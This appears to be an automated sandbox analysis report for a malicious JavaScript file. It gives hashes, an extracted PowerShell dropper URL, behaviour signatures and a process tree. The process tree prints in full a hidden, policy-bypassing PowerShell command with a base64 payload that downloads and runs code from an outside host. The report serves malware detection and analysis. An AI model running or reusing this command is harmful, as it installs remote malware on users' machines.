Analysis

  • max time kernel
    0s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/01/2024, 10:04

General

  • Target

    3c61d239a11ae0d2be0f6bd9c3e3b715.js

  • Size

    78KB

  • MD5

    3c61d239a11ae0d2be0f6bd9c3e3b715

  • SHA1

    34b463b87711ce55d58a4256cc3802e11ae0906f

  • SHA256

    6db41851a55f3efacb61f780d08271b884a5fe346725b7e22b1e082702dcab62

  • SHA512

    40c023c05c55a197204c3708d7f5769e7f309322fd109cc2d09ceec9a4fc54a4929e9ec42b5ff8c126fbfb2557cc1589fd65667b174fc8876ab39375b6757d13

  • SSDEEP

    1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oU:59Ry98guHVBqqg2bcruzUHmLKeMMU7GK

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3c61d239a11ae0d2be0f6bd9c3e3b715.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
        PID:1580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      1⤵
        PID:3060

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/3060-6-0x0000000001F00000-0x0000000001F08000-memory.dmp (Filesize: 32KB)
  • memory/3060-8-0x0000000002C50000-0x0000000002CD0000-memory.dmp (Filesize: 512KB)
  • memory/3060-11-0x0000000002C50000-0x0000000002CD0000-memory.dmp (Filesize: 512KB)
  • memory/3060-10-0x0000000002C50000-0x0000000002CD0000-memory.dmp (Filesize: 512KB)
  • memory/3060-9-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp (Filesize: 9.6MB)
  • memory/3060-7-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp (Filesize: 9.6MB)
  • memory/3060-5-0x000000001B570000-0x000000001B852000-memory.dmp (Filesize: 2.9MB)
  • memory/3060-12-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp (Filesize: 9.6MB)